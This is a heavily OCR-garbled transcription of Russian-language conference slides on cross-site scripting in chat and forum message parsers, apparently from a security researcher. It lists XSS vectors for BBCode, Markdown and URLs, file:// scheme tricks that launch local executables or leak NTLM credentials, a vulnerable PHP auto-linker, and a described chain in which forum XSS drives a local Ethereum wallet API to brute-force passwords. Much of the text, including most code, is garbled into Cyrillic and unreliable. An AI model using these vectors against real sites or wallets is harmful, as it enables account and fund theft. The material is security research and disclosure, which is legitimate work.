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а 


О чем пойдет речь? 


Что такое ХЗ$ и чем это 
грозит? 


Как искать Х$$ при отправке 
красивых сообщений? 


Свежая идея по поиску 
таких багов. 


@) Уязвимости у известных 
вендоров, обнаруженные 
в процессе исследовании, 
и немного о том кчему они 
могут привести. 


`В, Способы защиты ота доя. 


Некоторые из исправленных уязвимостей 


уВийейп Кауако Нераезк 


Х$$ в сообщении -> [С\УЕ-2021-29231] Х$$ Х$$ в сообщении в саппорт-> 

Выполнение кода на сервере в викистатье повышение привилегий 
МуВВ ВоскеСспа{ 0О1$соигзе 

[С\Е-2021-27279] Х$$ Х$$ в сообщении [С\Е-2021-3276] Х$$ 

в сообщении -> Выполнение в десктоп приложении -> в сообщении -> повышение 

кода на сервере Выполнение кода привилегий (требует 

(ВСЕ уязвимость нашёл на стороне клиента отключение СЗР по 

другой парень и она была умолчанию) 


исправлена в следующем 
патче) 


Некоторые из исправленных уязвимостей 


уВиПат < 5.6.4 РЁЛ, 5.6.3 РЕ, 
5.6.2 РЁ 


МуВВ С\Е-2021-27279 


РММЛК! СУЕ-2021-29231 


Воске{.Спа{! С\Е-2021-22886 


О!зсоигзе С\УЕ-2021-32764 


Кауако Нераезк 


[МРЕО=Че${;123"]аме[РОМТ="Сотис Зап$ оптоизеоуег=а!е[(1) 
а"12з/ЕОМТ]аме[/\ОЕО] 


[ета ехатре@ехатр!е.сот?зибес=могкКета|=ехатр!е@ехатр/е.сот'? зи ес=могк 
оптоцзеоуег=а!ец(1) аометк1ех{[/етаИета!] 


%аейпе=ИКедгаретий гоп{Чатпу='аме="а$4'% 
(:Чм Ше='аз%Шедгаренин% заа' зуе='аза':)"оптоизеоуег="аец(1)" {ез1 


[ ](ПЕр:/Лмммм.дооде.сот) 
\мммим/.доое.сот/ра<пПйр://доое.сот/оптоизеоуег=ае[(1):;рагетЕетет.тпегНТМЕ=/ 
оме/.зоигсе аме|Тежып/е.рпр 


п рз://сопзет.уощирбе.сот/т'?сомтие=Пр%За//А\м\мм.уощибе.сот/масп% 3 /%Заоме_Ё 
Орп]9Р$0%39\ме%2526%2523х22а\ме%2526%2523хЗедме%253с!ит9%2526%2523х0азгс 
%2526%2523х34$%2526%2523х0аопегог%2526%2523хЗарготрк1)%2526%2523хЗеаме 
%2526%2523х3с/а%2526%2523хЗеа\медемеа\ма%2526%2523х22амемеомеема&9|=0Е & 
т=0&рс=У&ихе=23983172&П|=ае&$гс=1 


ИНр://дооде.сот/аме"><итд/згс='$'опеггог="ае"(1) 


Что такое Х$$? 


[8 Х$$ 
(Стго$$ эке эсирипа} 


— атака, позволяющая 
управлять браузером жертвы, 
используя Чауаспри. 
Возникает, когда 
злоумышленник может 
внедрить произвольный 
чауа$ сир: код 

на страницу, которую посетит 
пользователь. 


ре 


Х$$ термины 


Х$$ вектор 


Кедице$1 


Вами | Рагатз | Неадегз | Нех 
— фрагмент НТМЁ кода, 
передаваемый злоумышленником 1 БЕТ И/ква1кесь. рьр?аЕ1=< вск рЕ>а1 веке (1) <Изск1ре?| ВТ. 1 
На страницу И ПОЗВОЛЯЮЩИИ - а на (Итпаомз МТ 10.0; №1164; =х64; 
выполнить уауаспр\. 


Ргеу МВ \п Аспоп5 м 


гу: 93.0) Беско/20100101 Е1лкеЕох/ 93.0 
соабелеё-тезаеН: 2 


(п ш 


х55 СОТехт 


Ке5роп5е 


Кам | Неадегя а Х$5 уе СТОГ 


ХЗ контекст ны 0 ЕЕ хи 


И 
11 </БеаЯ> 
—= Х$$ 12 «БоЯу> 
место на странице, где 13 <а Нее Е="<зсЕарЕ>а1ек® (1) </зсекалрЕ>">С11сЁ Бегке о Бе гедткесЕеЯ</а> 
ЕЕ Е ЕЕ ЕЕ Е НЕЕ Е 


13 
вектор попадает. 2 


15 «ИУБЕмт > 


Х$$ контекст подробнее 


<Ч1\ с1а5="<5сг1рф>а]ег{(1)</5сгтрф>" >< /91\> 
<{1{1е><5сг1рт>а1ег{(1)</зсгтрт>< /т111е> 
<Тех{фагеа><5сг1рЕ>а1ег{(1)</5сг1рт></Техтагеа> 


Пример разных контекстов <5Ту1е><5сг1рф>а1ег{(1)</зсгтре></5ту1е> 
. <по5сг1рф><5сг1рЕ>а1ег{(1)</5сг1рт></позсг1ре> 
где /ауазспр! не выполняется. <поетбеа>< сг1рф>а1егт(1)</зсг1рт></поетбеа> 


У <Тетр1афе> 
У ндоситепт -Тгавтепт 
<5сг1рф>а]1ег{(1)</зсгтрт> 
</Тетр]1ате> 
<!--<зсг1рЕ>а1еге(1)</зсгтрф>--> 


Разные НТМЕ теги позволяют выполнить /$ при разных условиях. 
В то время как <а> требует взаимодействия, <Шате> может быть 
полностью автоматическим. 


‹а оп11СсК="а1ег{(1)"” оптоизеоуег="а1ег{(1)" Вге+="] ауазсгтр* :а]ег{(1)">фез{</а> 
У <1{гате оп]оа4="а1ег*(1)" згсдос="<$сг1ре>а1ег{(1)<$сг1р*>" згс="]ауазсг1р*:а1ег*(1)"> 


Опдадт и ЗОР 


— ОБЕ адрес страницы, (Зате Опдт Ройсу) 
на которой выполняется — Политика безопасности браузера, 
скрипт. 


не позволяющая скрипту на одном сайте 
выполниться на другом или же получить 
с другого сайта данные средствами уауасир\. 


Ол 
вы 
П(р://зКе1.ги:8080/ П{рз://$Це2.ги :8080/ 


Опдадт и ЗОР 


НТТР:/ЕХАМРЕЕ.СОМ:808ОЛпаех. пт! 


Ю(о://зесге.сот:8080/5есгет. Пит! 


//ехатре. сот:8080/зесга. М! 


/зесге.Мт| 


п(р5$://ехатр/е.сот/ 


‚ ПЫр:/ехатре.сот:8081/зесге. Пт! 


оо © © @® 


Домен отличается — 
доступ запрещен. 


Идентичная ЦВЕ схема, 
домен и порт - ок. 


Относительный путь, 
подразумевающий тот-же 
домен порт и схему - ок. 


Схема и порт отличаются 


Другой порт — доступ 
запрещен 


Опадт и ЗОР 


В обычных условиях вредоносный уауа$спрЕ может 


украсть такие Данные, как. 


УТ Скриншот страницы (Пит!2сапуаз) 


ТЕ Контент страницы (из свойства 
шппег-Т МЕ у объекта 
аоситет.аоситеЕетеи1) 


ТЕ Адрес страницы, |Р пользователя и 
версию браузера (отправив запрос на 
свой сервер) 


УТ Куки для уязвимого веб-приложения 
(только не имеющие НТТРОпу флага) 


Е 


зеззюп огаде и оса! 5югаде браузера 


1 Доступ к камере и микрофону (если 


И 


уязвимый сайт уже запрашивал доступ к 
НИМ) 


Перехватывать следующие страницы, которые 
пользователь будет посещать на этом же 
сайте. (Не может перехватывать, если 
пользователь перейдет на другой сайт, а 
также адрес бар замерзает на первой 
странице) 


Опдадт и ЗОР 


Вредоносный уауаспр\ также может 
содержать: 


©) Одау эксплойты под браузеры 


Перехват паролей сохраненных 
в браузере/менеджере паролей 


Перехват паролей при их вводе 
в форму логина/кредитных карт 


©) Повышение привилегий в приложении 


Повышение привилегий и эксплуатацию 
полученного функционала 


Опдат и схема Ше:// 


(>) Выполнение локального файла 


<а пге!="Ше:///с:/\мпао\ми$/зуЗет32/са|с.ехе">сас</а> 


©) Утечка МТЕМ аутентификации (только для ммптао\$) 


<ита згс="Не://гетоезтбпо${.пе/итаде.|рд" /> 


©) Выполнение удаленного файла, используя ЭМВ (только для ммп9о\м$) 


<а пгЕ{="1е:/тетоезтбПо$.пелез1.{1х{">гетое Ше</а> 


Чтение произвольных файлов, используя ХМЁЕНЕрКедие$, 
айфреймы и ммпао\/.ореп() 


Х$$ на миллион долларов 


Как-то раз я попробовал поисследовать до-еПегеит кошелек (дей). 


. Сет поднимает локальный веб-сервер 
с У5ОМ АР! для управления кошельком. 


Вот что 

удалось . Пользователь может запустить веб- . 

«наковырять»: сервер небезопасно, для максимальной 
совместимости с \меБЗ сайтами. Баг ЗОР 


рура$$ возникает при использовании 
“--ПЕр.согзаотат *” атрибута при запуске. 


©®®® > ли — анегеит сот х 


= Ж Фюит.етегеит.ога/теззадее) 


Е{Пегеит Соттипй_у Рогит огит.е!пегеит.ога зауз: 


Для успешной атаки 
злоумышленнику нужен 
интернет трафик с тематикой 
ЕТН. 


Я нашел 0Одау Х$$ на форуме 
югит.егпегеит.огод, 
позволяющую грузить свой 
скрипт всем посетителям. 


(еауе Сопмегзайюп ееениЕя 
]> 


п {75 Сопуегзаноп 
АДА Реор 10 {113 Сопуегзаноп 


Х$$ на миллион долларов 


Первый баг на гогит.еПегеит.ога (уапШа) это Х$$ в любом сообщении 


Пример сообщения: 


<@\><!|СОАТА|[ ><итд $гс=$ 
опеггог=раге Е ететтптпегНТМЕ=";аоситет.боду.аррепаСп!а(аоситещ.сгеаеетепк‘$спрг)).згс='ааа:,а!е\(1)'> ]></ам> 


это Х$$ на любой странице форума, используя функционал 


Второй баг редактирования баннера в админке %уапа%/дазПБоага/зе паз/Баппег 


Чтобы получить трафик Тогит.еПегеит.ога, мне нужно было отправлять на 
форум вредоносные сообщения и ждать, пока одно из них не прочитает админ. 


Х$$ на миллион долларов 


“] Админ читает сообщение, баннер 
еще в норме... 


Ва 96.05х27 
адтт аКаскег 
>” 
4 = х #* ацасКег 
М№ем/ Ме55аде ]]> 
м диде 


Теауе Сопуегзапоп 


п 115 Сопуегзаноп АЯ а Меззаде 


аапт 


ацаскКег 


Ада Реор!е {о {11$ 


Сопуегзайоп 
(2 (7 
Аа ь говнимУ 
(к а. ете Сопзо!е — Зоигсез { + се ептог =. еси\у А 


У <Бобу 14="сопуегза*{10п5_тез5авез_1п4ех” с1а55="Сопуегза{ 101$ Мез5арез$ Тадех 5ес%1оп-Сопуегза{1от” 5$у1е 
У <63\ 14="Егате 
У <93у с1а55="Неаб” 14="Неза 
У <93\ с1а55="Вом 


У <54ГОПЕ с1а55="5 {ет {1е 
.. а! /№ап111а/”>Мап111а 2</а . 


/5тгопв 
> <61\ с1а55="51{ебеагсй">..‹ /41\у 
> <и1 с1а55="51$еМепи">..<‹|\1 
/93\> 
/а3\ 


> <41\ 14="Вобу">..</93\> 
> <43\у 14="Роо*">..</93м> 


$епд Ме$заде 


В это время скрипт скрытно завершает 


«Я 
выполнение, и меняет баннер. 


Вот, что теперь можно будет увидеть 
в его коде, если обновить страницу или 


перейти на другую. 


[к п Нетег!5  Соп5ое — $о4гсез емо Рейогтапсе етот Арриачоп у 
т] 1апе=“еп 
> ‹пеад>..‹ /пеаа 
У‹Бобу 14="сопуегза{1015_тмеззаее$ 1пдех” с1а55="Сопуегза{10п5 Меззарез ]1пдех $ес&1оп-Сопуегза*{1от” 5%у1е 
У<061\/ 19="Ргате 
У‹61\у с1а$$=“”НеаЯ" 19="Неад 
У<01\ с1а$5="Вом 
У <5+гопв с1а55="51{е11{1е 
У‹а Вгё+=“/уап1]1а/”> == $9 
"Мап111а 2" 
/5сг1руе 


5СГ1рЕ $гС=" Ц 
/а> 
/5 гоп 
> ‹01\/ с1а55="5 МебеагсИ”›..< /41\> 
р ‹и1 с1а55="5КеМепи">.</и1> 
‘(91 
‹/93\> 
> <41\ 14="Вобу">..</94м> 


Х$$ на миллион долларов 


А теперь небезопасно она разраешает риа АР! 
запустим кошелек и кошелька скрипту на любом 
и попытаемся зайти мы 
Параметр 
на форум со скриптом 
в баннере. 


означает, что для указанного 
кошелька пароль будет запрошен 


только единожды, сразу после 
запуска 


иП[ОСК 


= Узек 11 акоч5 Ету че И 


ии ——кроссокзФомталтп ">" ип ос 


—рс —_пебыоккт4 8345 —-крсарт 5 айтт „Че НРУ 
з5И,Ехроо 1, рерзопа]1,еЕН,пее,меЪЗ"’ сопзо ]е 
|: 


* 


329 Шсее гтЬБбаи 


6е054915с1 034 бссЁЁ5а5 811 


Х$$ на миллион долларов 


ЕЕ 


Ноте 


Мапа 2 


Номиау, $4гапдег! 


№ юоК$ ШКе уоц'ге пеми Пеге. # 

оц мгапт то дет пуоуеа, сИск и 
! 9 | ВАМ! Уоц’уе дота $меет Гогит 
пе о! {Пе5е Бипоп$! 


1] мем 1 соттепт Мо51 гесепт Бу 5ует 2:4 


$ т || Кедтзтег 
Сатедопе$ 
Кесепт 015Си$$ ЮП$ 


А + 
АСИм Ку 


Сааедопе$ 


к ы : и) 7: 


А! Сатедопе$ п пои 


Сепега! В 


[к а] Нетегй5  Сопзое  Фоигсез  Мебмок  Рефогтапсее  Метогу  Аррисаноп 
© вр У Ам Дези 1еме!5 У 
Ех еже зб. “+: ъъь. 


> ХНЯ +1п151е4 1са41пе: РОЗТ " 
> ХНЯ +1п15$Неа 1оад11Е: РОЗТ "ВЕфр: //10са1п05*:8545/". 
5а5811 +ог ип1оск1те 


> ХНЯ +1п15пеа 1ог4\е: РОЗТ “ВЕТо: //10са11051:8545/". 


4 ” г га 
го кео ма 9х 34539сее /Э6бад 3+6е0Б4ч 


>ХНЯ +1п15Неа 1са01тЕ: РОЗТ "Во: //10са11051:8545/". 


>ХНЯ +1п15$пед 1оад1те: РОЗТ "НЕфр://10са1п0$*:8545/". 
>ХНЯ +1п15пеа 1о0а41пе: РОЗТ "Во: //10са1п05*:8545/". 


>ХНЯ +1п15Нед 1оад11е: РОЗТ "НЕО: //10са11051:8545/". 


4 7рАл 


Сепега! 


Зесигйу 


Сначала скрипт получает список всех кошельков 
пользователя, дальше проверяет, требуются 
ли пароли для существующих адресов ЕП. 


Если находит адрес, который не требует пароля, 
сразу выводит его баланс. 


Для тех, которые требуют, пытается подобрать 
по словарю и также выводит баланс в случае 
успеха. 


> ХНЯ +1п151ед 1оа41пе: РОЗТ "НЕТо: //10са1105+:8545/", 
> ХНА +1п15Не4 1оа41пв: РОЗТ "НЕЕр://10са1105+:8545/". 


Раззиюг4 дмегРу Гог ма Пет 0х46а92с49467с++858427с42561476738 


Ч 123456 Рог ма ет 9х46а92с49467с++858427с4256147673817‹ 


> ХНЯ +1п15Нед 1оа41те: РОЗТ "ВЕФр: 


. 15 2уег=5:2 
1е 425 Зацегу. тт. $ 2уег=4:46 
РОЗТ "ВЕр: //10са1п0$+1:8545/". Зацегу.т11.]52уег=5:2 
Раззьюга 1да72щ< 4311е+ 9х46а62с49457с++888427с4256147673817СЕЕ5<с! Е ма11а Зацегу пт. ]5$2уег=4: 46 
>ХНЯ +1п15Пеа 1са41пе: РОЗТ "ВЕТо: //10са11051:8545/". 1ацегу.т1п. 5 2уег=5:2 

Ыа ©>+ ;х453592с 48 #488847 1256147 : ‚+ " 1ачегу. тп 152уег=4;:39 
> ХНЯ +1п15Нед 1о0а41пе: РОЗТ “"НЕФр: //1оса1п05*:8545/". Зацегу. тп. 5 2уег=5:2 


[валапсе 15 1337 еп шел Зазмесаа: 


ВЫ -` : = х о. лс-@-лоаь рр, 
РАаззьюга 1а2м5е тог ша Ше вхабао2савао /сттьва 


>ХНЯ +1п15Неа 1са41пе: 


: 
| — 


Х$$ классификация 


Хранимая/отраженная 


Требует 
ли взаимодействия 
от пользователя 


Для отраженной при открытии 
уязвимой страницы ХЗ$$ вектор 
должен передаваться каждый 
раз. При хранимой — только один 
раз 


Иногда Х$5$ вектор не позволяет 
выполнить уауа5спрЕ сразу после 
открытия страницы, вместо этого 
пользователю придётся навести 
мышку/кликнуть на элемент с Х$$ 


Взаимодействие с пользователем 


ПРИМЕР: 


ХЗ векторов, 
требующих взаимодействия: 


<М№ оптоизеоуег=а!ец(1)>е${</@у> 
<Я опс!ск=а!ец(1 )е{</ам> 


<а пгЕ!=|ауазспрЕаец(1)>сйск те</а> 


ОС 


Взаимодействие с пользователем 


Х$5$ вектор, 
автоматически запускающийся через оптоизеоуег: 


(4) < 


оптоизеоуег="раге Е етет.гетомеМоае(1$);а!е (123) 


" эуе="розШоп:аозо|Ще ор:-500рхлен:- 
500рх;пев:2500рх мме{1:2500рх">е1</ам> 


ООМ Базеа Х$$ 


ООМ Базеа х$$ 


РОМ 


(аоситепт{ обес{ тоадЕ!) 


— Гакой вид Х$$, когда Х$$ вектор не попадает НТМЕ код 
в ответе сервера, а попадает через Чауа$ сир 
используемый на странице. 

Для примера когда данные из уауаспр: |осайоп.зеагсй 
передаются в доситет{.боду.ппегАТ МЕ. 


— модель представления всех НТМЁ элементов на 
странице в виде уауаспрЕ объектов. Другими словами, с 
помощью этой технологии, манипулируя свойствами 
ЧауазспрЕ объектов, мы можем манипулировать 
свойствами НТМЁ элементов на странице. 


Пример ООМ Базеа Х$$ 


Уязвимый $ код: <$спрь> 
анцегузипа = |осайноп.зеагсп; 
иПРагат$ = пем УАЕЗеагспРагат$(ацегуипод); 
гедгеси = иИРагат$.9е('Ц АГ); 
доситептлмще(`СПскК <а Вге!="${теднес и \">пеге</а> {о бе гедпемесд`) 


</эсирф> 
Оп{пе )амазспри Е4Йог х + (*) ю 2 ь 
> С @ 8 5://5.ао/?УВЕ=а$4"> <1т9%205гс=5%20опег... % № о: 
|осаНоп.зеагсй хранит данные закодированными ный В Заальь 
в ипепсоде. 4$.4! ' 
"Е ой усиг с [ок | 
Соде ада | ши | 
Но ЧКЕЗ$еагсйРагатз декодирует их перед ИеиИИ о се [ А татенок “| асеиеренсе 
передачеи на страницу. о = им1пдом.1оса1оп.зеагсй; ее 
иг]1Рагатз$ = пем УКЕ5еагсИРагат$ (диегу 
гед1гесуВЕ = ичг1Рагат$ .веф('0вь') 
доситеп+ .мг14е(`С11сК ‹а Пге+="${геа1 
</$сг1р*> 


Давайте поищем ХЗ5$, 
где-нибудь при обмене сообщении! 


уВиЙейп и обычный Х$$ тест 


Ргемем 


Ч\.ро${-сопепе.гезфоге.]-ро$* _ 
сотщеп{-{ех{.В-м/ог4мтар 


142.03 х 15 Тофау, 12:03 РМ 


{5 Сопзо[е 5оигсе$ Ре{огтапсе Метогу АррИсаНоп ЗесиЙу ЦабФоцсе Меблмлогк 
'«41\ с1аз5="]$-роз® _сопфепф 11$&-1фет-Боу сопуегзат1опт-Бойу” > 
«В? с1азз=“"Б-ро${__ 5Тгеат-роз{-11{1е ]з-розт-{11е В-Б1ае“></в2> 
<«Ч41у с]1аз5="роз{-сопфеп{ гезфоге ]5-роз®__ сопфеп*-Фехё П-могамгар” 1етргор="Фех{" >& №; зсгтрЕ&ее;а1ег{(1)& М; Изсгтре&ее; </91\> 


уВиЙейп и обычный Х$$ тест 


Неужели тут нет Х$$? 


@® Самой простой - нет. 


2) Смотрим, используются ли в сообщениях парсеры. 


НТМЕ как разметка сообщений 


Пример: Мапа огит$ СМ$ 


|МРУТ 


ОЧТРОИТ 


Сатедогу Зее а саедогу... м 


О15си$$юп ТЩе 


Бо|а 


Бы ипае!те 
<> Бо|4< /Б> 

<и>ипаейте< /и> , 
птаде: <итд $гс="/ /4009е.сот/фамсоп.1<со"> паце. 

ий: <а Иге!=" / /доое.сот">9004|е.сот< /а> 


ий: дооде.сот 


Аппоипсе ® Боп“ аппоипсе. О ш \1е смедогу. (О п \е саедогу апд гесепи 415си$$юп$. 


Ро${ О5сиз$юЮп || Зауе ОгаЯ || Ргемем | Сапсе| 


ВВсоае 


[6Кех{/б] <о>ех{</о> 

(Кехл] <1{ех{</> 

[иКех/ч] <иех{</и> 

[соог=геаКех{/со|о!| <оп{ со|ог="гед"еж<Лопфь> 

[$912е=6аех{/з12е] <ющ эзуе=Чопеяте: 619 ;"еж{<жЛоп> 
Гоп1=уегаапайех Лоп! < Зуе=Чопатиу: уегаапа;"еж=<Лоп> 
[ета|=изег@та!.ги{ех{[/ета!] <а Пге!="тащо:изег@тай.ги"еж</а> 

[и рЕр:/доод!е.сот[/ии|] <а пге!="ПЕр://дооде.сот">Пр://дооде.сот</а> 


та Ламсоп1со[Лтд] <ита эгс="Ламсоп.1со" /> 


Магкао\м/т 


[МРОТ 


"ЧехЕг” 


_ТехЕ_ 
(ех|(пИр://доое.сот) 


ех((Ламсоп.!со) 


ОЧТРОИТ 


<6>ех{</б> 
<1{ех{</1> 
<а пге!="ПЕр://дооде.сот">еж{</а> 


<ито згс="Ламсоп.1со" ай=Чех{" /> 


МЛКНех! 


""Бо!а"" <0>604</0> 
"Кайсхе" <!>Цайсхе</> 
{Гоп соо уейомех8} <зрап эуе="Баскагоипа-со!огуейо\и: 


[П{р://дооде.сот {ехИ со|ог:,"4еж{</зрап> 


<а пге!="Пр://дооде.сот">еж{</а> 


Другие часто встречаемые парсеры 


МРОТ ОПТРИТ 


‘зтИе: <ита згс="/зтИе.рпо" {Ще="$тйе"> 
#пазЩад <а Пге{="/зеагсп?а=%23ЗпазМад">#пазМад</а> 
@изетате <а 


Юге!="/зеагсп?а=©@изгегпате">©@изегпате</а> 
$ ://ммм/.доое.сог/ 
| <а пгЕ!="ПИрз :/Лммим.доое.сот/"> ПЕ рз ://ММИМ. 
изег@та!.сот дооч!е.сот/</а> 


<а Пге!="таШо:изег@тай.сот">таШо:изег@таи. 
сот</а> 


Тест сообщения на парсеры 


\мимим/.доод!е.сот //М/мМ\М/.доое.соп 
ПЕр://мммми.доо0е.сот/ Ир://мм/\ми.доо(е.согт/ 
Не://\мммими.доо0е.согп/ {е${://\мм\м\м/.доо0е.сот/ 
изег@тай.сот таШо:изег@та!.сот 
127.0.0.1 юсапо${ 

уощибе/мтео ип, |пК$ {© тр3З/тр4/ред Нез 
зотейтез$ сап ое изеа Тог етбедатда теспа. 


Языки разметки: 


<0>НТМЕ {е$1</о> [6]ВВсоаде {ез{/6] 
**Магкаомт 1е$1 1** __ Магкаомипт {е$1 2___ 
""Меда\/К! {ез{" В<РОР 1е$ф> Ло АТЕ 
1е58 \6 АВТЕ {ез1 2\60 


ОКЁки с параметрами: 


мимим/.доое.сот/ра@/?рагат=уаие 
\мимими.доод!е.сот/рай/#рагат=уаше 
/МА\м\м.доое.сот/ра{п/?рагат=уаие 
/МАм\и.доо0е.сот/райп/#рагат=уаше 

Ио ://млмм/.доофе.сот/рай/?рагат=уае 
ПЕр://мммим/.доод[е.сот/рай/#рагат=уаше 
изег@тай.сот? зи ец=уаме 
изег@та|.сот?сс=уае 
тащо:изег@тай.сот'?зибец{=уаше 
тащо:изе@та!.сот’сс=уаме 
ПНо:/ДезИ 1е{2@адооце.сот/ 


Смайлы: 


(етой) :) :зтйе: :0 


уВиПа&т и тест парсеров 


{е$1 
Тодау, 12:25 РМ 
у ОВи$ - ок 
ава би 
ум. 9009. сот /Ммим. аооде.согл ПИр:/Амм дооде.сот/ Ир:/Амим. дооде.сот/ @е: одеты -/мумму. дооде.сот/ изег@тай. сот 
ад пашо`изег@тай. сот 
Адгиисга!ог 127.0.0.1 юсапо$ 
уощибемтео ий$, ппК$ {о тр3З/ипр4/ред е$ зотейте$ сап бе изед юг етбедта тефа. 
оп Вае: 042021 ОВЕ$ ми рагате(ег$: 
Вок: 8 млм. д000е соп/ра/?рагат=\уаше м/м. дооде соп/ра/#рагат=уае /Ммм\м. дооде.соп/ра®/?рагат=уае /Мммм. дооде.сопураи/#рагат=уаме 


Афр./млмм. ооде сопура/?рагат=уаше ПИр`//мм\м дооде.соп/ра/#рагат=уаме изег@тай.сот?зищес=уаше изег@та!.сот?сс=уаме 
пашо:изег@тай.сот?зиес=уаше таЩо`изег@тай. сот? сс=уаше пир/ЛезИ {е${2@аооде. сот/ 


ны ВВсофе$ - ок 


<6>НТМЕ {е${</> ВВсоде {ез{ Ето {е5{2__ "Меда\мке${" В=РО {е$> \Ь ВТЕ {е$1} \Б ВТЕ {е$1 2\50 


тез: 
© (ето) © зте: © = Нее ОК 


Тад$: М№опе 


Ссылки стали кликабельными, смайлики 
картинками, и что дальше? 


® Находим все возможные строки, превращаемые в НТМЁ 


2) Проверяем их 


Известные техники 


Тест на недостаточную очистку НТМЁ символов 
(Просто добавляем символы < > ' "и смотрим, что вышло) 


ВВсосе: 
[ачое]<зсир>аец(1)</зсир>[/ацое] 


ОАЕ: 
мимли.доофе.сот/?рагат=уаше"><зсирё>аег(1 )</зсирЬ> 


Магкао\/п: 
[9оод!е.сот]|(ПЕр://доое.сот"><зспрЕ>аец! 1`</зсирф>) 


Известные техники 


Тест возможности внедрения |ауазспрЕ ОКЕ схемы 
(ЧаМазсЕ ре: ‚, \ауазсири://1 , |ауазспр&сооп:1 , |ауазс&#хОанрЕ:1 , @с) 


ВВсоае: 
[и ]ахуазсирЕает(1)[/ип] 


ОАГ: 
|амазспрЕ://доое.сот/?а=%0ааек(1) 


Магкаом/п: 
[94оое.сот](]амазсиреаег 1”) 


ето Тог \ауазсир!: ЧАЁЕ Х$З 


() Пример теста ОКЕ схем: Са: 


.‚ Первая ссылка содержит схему ПЁр. ОВГ 5сВеше {е5( 
Бер://сооз[е.сош/ ч\е://соо$[е.сот/ 
° Вторая — произвольную. ]ауазсире://зоо[е.сот/%Оааег( 1) 


. Третья — небезопасную схему ауазспр. 


ОКЕ эсйете фе$* 
Пр: //50081е.сот/ дме://во0о51е.сот/ ^ 
. . #4 


Фрагмент НТМЕ кода ‹а пге+="ВЕЕр: //роор1е. сот/">НЕЕр: //воов1е.сот/</а> == $0 
‹а Пге{="дше : //роо21е.сот/" >дме: / /вооР]е.сот/</а> 
получившегося ‹а Пге{="] ауа$сг1рт: //20051е.сот/%9аа1ег{(1)" >] ауа$сг1р{: //20021е.сот/%9аа]ег{(1)</а> 


сообщения: 


Известные техники 


(3) Тестирование внедрения Не:// ЧКЕ схемы 


ВВсоае: 
[4 Ше:///С:Ампаом/5/зуЗет3 2/сас.ехе'?1оса[/ип] 


ОВГ: 
Не:/гетоеМВзегуег.сот/гетбфщейе.1х{ 


Магкао\/п: 
[9оое.сот](е:/тетоеМВзегуег.сот/гетофейе.{х{) 


Демо для Не:// схемы в аезКюр приложениях РЕ 


©) Текстовый редактор АкаРач 
умеет подсвечивать ЧК 


и делать их кликабельными. Я ТИ в х 
Ее Ед Мел $ рнопс Нер = З{ап4аг 79 о 
-// 
В то же время он парсит УВЕ ир://00дю.сот 0 
6 _ аме://дооде.сот к 
еее о неоезопаснои в - Посойо СО , | | р 
схемой П[е://. Пе://ооде.сот 


Не. /Лосапо$Ус-/мипдом5/5у$ет32/сас .ехе 


©) По двойному клику по такой 
последней ссылке можно 
запустить локальный файл. 


Известные техники 


(4) Тестирование на декодинг 


. ипепсоае (%3с) ’ НТМЁЕ епШез (&патеа; епийез - &Н; / &#хНЕХ; 
. зоп (\и003с) еп{Ше$ - &#хЗс; / &#АЗСП; епШез - &#60; ) 
. (55 (\ЗС) . чауазсиы чу: (\хЗс) 

ВВсосае: 

[4 АКр://чаооче.сот/?%22%3е%3сзсир{%Зеаен(1)%3с/зсир%Зе[ип|] 

ОВГ: 


П(р://доое.сот/?%22%3Зе%3Зсзспр{%Зеаец(1 )%3с/зспр{%3Зе 


Магкаом/п: 
[9009[е.сот](ИЕр://доое.сот/?%22%3е%3Зсзспр%Зеаец` 1`%3с/зспр%Зе) 


Новая идея 


ТЕСТИРОВАНИЕ 
НАЛОЖЕНИЯ 


ПАРСЕРОВ 


Наложение парсеров 


$ 29 `) 
} 

- состояние, когда одна строка и 
обрабатывается двумя 
парсерами по очереди, что при м ЭР. съ ТНЕЫ 
определенных манипуляциях, У/паипеие и 5депт$2 
дает внедрить ЧауаЗсир{ на 
страницу. 


Наложение парсеров (в чем логика) 


Опапа! теззаае 
запшге < >‘ 


Рагзег 1оокпа ог ЧРВЕЗ 


Рагзег 1оокта Гог етай$ 


Меззаде мп сиска бе 
ета!$ апа ЦРЕ$ 


Наложение парсеров 
(пример уязвимого РНР кода) 


<?рйр 

Типсйоп гаитСЫскае($ при!) 

{ 
Фирщ = ргед_гер!асе("/(ПЕр|пирз|Шез) \Л/[^\з]*/, '<а Вге!="${0}">${0} </а>', $три; 
Фири = ргед_герасе(“"/([а-гА-20-9. _-|+@Г[а-2А-20-9._-|+\[а-2А-20-9_-]+)(\?\м*=[^\$] |), '<а Иге="тао:${0}">${0}</а>', Фтри?; 
Фирчщ = ргед_герасе('Ап/, '<Бг>', $три\); 


геигп Фириш. "\п\п"; 


фтеззаде = геципСИскае(ми!5реса!спаг$($ СЕТ[т$9')); 


?> 


Наложение парсеров 
(аето) 


Выдуманное 

приложение чата 

поддерживает Бер://соо$[е.сот/ 

не только ссылки изег@ота!.сот? за ]есе=НЫ! 
на сайты, но и 

етан. 


Пр: //воо8]1е. сот/ 
изег@5та11.сот?зи6]ес{=Н1 


<‹а Пге{=" Вр: //роов1е . сом/" >И Тр: //2о02]е.сот/</а> 
<Бг> 
‹а Пгет="та1 Фо: изег@етат1 . сот? зиб]ес=Н1" >изег@ета1].сот?зиб]есф=Н1</а> == $9 


Наложение парсеров 


(ето) 


Однако, если вложить 
ета! в обычную ссылку, 
оба парсера с работают 
и вернут нам 
некрасивое сообщение. 


В исходном коде можно 
будет заметить, что часть 
НТМЕ кода, отвечающая 
за ета! стала именем 
нового НТМЁ атрибута. 


Бер://Лазег(@ ета. сот? зи ]есеЕ">изег@ета!.сопа? 
заб]ес=Н!">Ьйр://азег@ета|.сот? за ]ес=Н! 


НЕЕр: //изег@ета11 . сот?и6ес&=Н1 


‹а Пге+="В{р://‹а пге{=" та11Фо:изег@рта11 .сот?5иб]ес{="Н1"" >В р: //изег@рта11 .сот?зиб]ес{=Н1</а> == $9 
"">изег@рта1 1 .сот?зиб]есф=Н1" >И {р ; //изег@ета1].сот?и6]ес&{=Н1 " 


Как это можно использовать? 


П(р://изег@тай.сот?зибес{="оптоизеоуег=а!ец(1)// 


<а Пге{="Пр://<а 


ге! ="тащо:изег©@та!.сот? зи е{="оптоизеоуег= 
аеп(1)//">ПЕр://изег@та!.сот?зибес{="оптоизеоуег= 
аеп(1)//</а>">изег@та!.сот?зибес<{="оптоизеоуег= 
аеп(1)//">ПЕр://изег@та!.сот?зибес{="оптоизеоуег= 
ае(1)//</а></а> 


Веащиечд 


<а Пге{="П(р://<а 


пге!="тащо:изег©@тай.сот? зи ец{="оптоизеоуег= 
